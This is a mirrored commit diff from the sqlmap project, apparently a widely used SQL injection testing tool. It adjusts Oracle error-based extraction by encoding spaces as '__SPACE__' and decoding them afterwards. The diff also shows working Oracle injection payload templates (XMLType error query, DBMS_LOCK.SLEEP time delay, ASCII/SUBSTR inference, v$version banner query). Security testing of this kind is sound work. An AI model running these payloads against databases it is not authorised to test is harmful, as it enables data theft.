mirror of
				https://github.com/sqlmapproject/sqlmap.git
				synced 2025-10-25 05:01:32 +03:00 
			
		
		
		
	fix for Oracle error based query "space" problem
This commit is contained in:
		
							parent
							
								
									878135fe40
								
							
						
					
					
						commit
						bf850af2d8
					
				|  | @ -358,11 +358,13 @@ def __goError(expression, resumeValue=True): | |||
| 
 | ||||
|     if match: | ||||
|         output = match.group('result') | ||||
|         if kb.dbms == "Oracle" and output: | ||||
|             output = output.replace("__SPACE__", " ") | ||||
| 
 | ||||
|     return output | ||||
| 
 | ||||
| 
 | ||||
| def getValue(expression, blind=True, inband=True, error=False, fromUser=False, expected=None, batch=False, unpack=True, sort=True, resumeValue=True, charsetType=None, firstChar=None, lastChar=None, dump=False, suppressOutput=False): | ||||
| def getValue(expression, blind=True, inband=True, error=True, fromUser=False, expected=None, batch=False, unpack=True, sort=True, resumeValue=True, charsetType=None, firstChar=None, lastChar=None, dump=False, suppressOutput=False): | ||||
|     """ | ||||
|     Called each time sqlmap inject a SQL query on the SQL injection | ||||
|     affected parameter. It can call a function to retrieve the output | ||||
|  |  | |||
|  | @ -91,7 +91,8 @@ | |||
|         <timedelay query="BEGIN DBMS_LOCK.SLEEP(%d); END" query2="EXEC DBMS_LOCK.SLEEP(%d.00)" query3="EXEC USER_LOCK.SLEEP(%d00)"/> | ||||
|         <substring query="SUBSTR((%s), %d, %d)"/> | ||||
|         <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END) FROM DUAL"/> | ||||
|         <error query="AND 1=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||(%s)||CHR(62))) FROM DUAL)" regex="Warning: invalid QName.*::(?P<result>.+?)&quot;"/> | ||||
|         <!--<error query="AND 1=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||(%s)||CHR(62))) FROM DUAL)" regex="Warning: invalid QName.*::(?P<result>.+?)&quot;"/>--> | ||||
|         <error query="AND 1=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||(REPLACE((%s),CHR(32),'__SPACE__'))||CHR(62))) FROM DUAL)" regex="Warning: invalid QName.*::(?P<result>.+?)&quot;"/> | ||||
|         <inference query="AND ASCII(SUBSTR((%s), %d, 1)) > %d"/> | ||||
|         <banner query="SELECT banner FROM v$version WHERE ROWNUM=1"/> | ||||
|         <current_user query="SELECT USER FROM DUAL"/> | ||||
|  |  | |||
		Loading…
	
		Reference in New Issue
	
	Block a user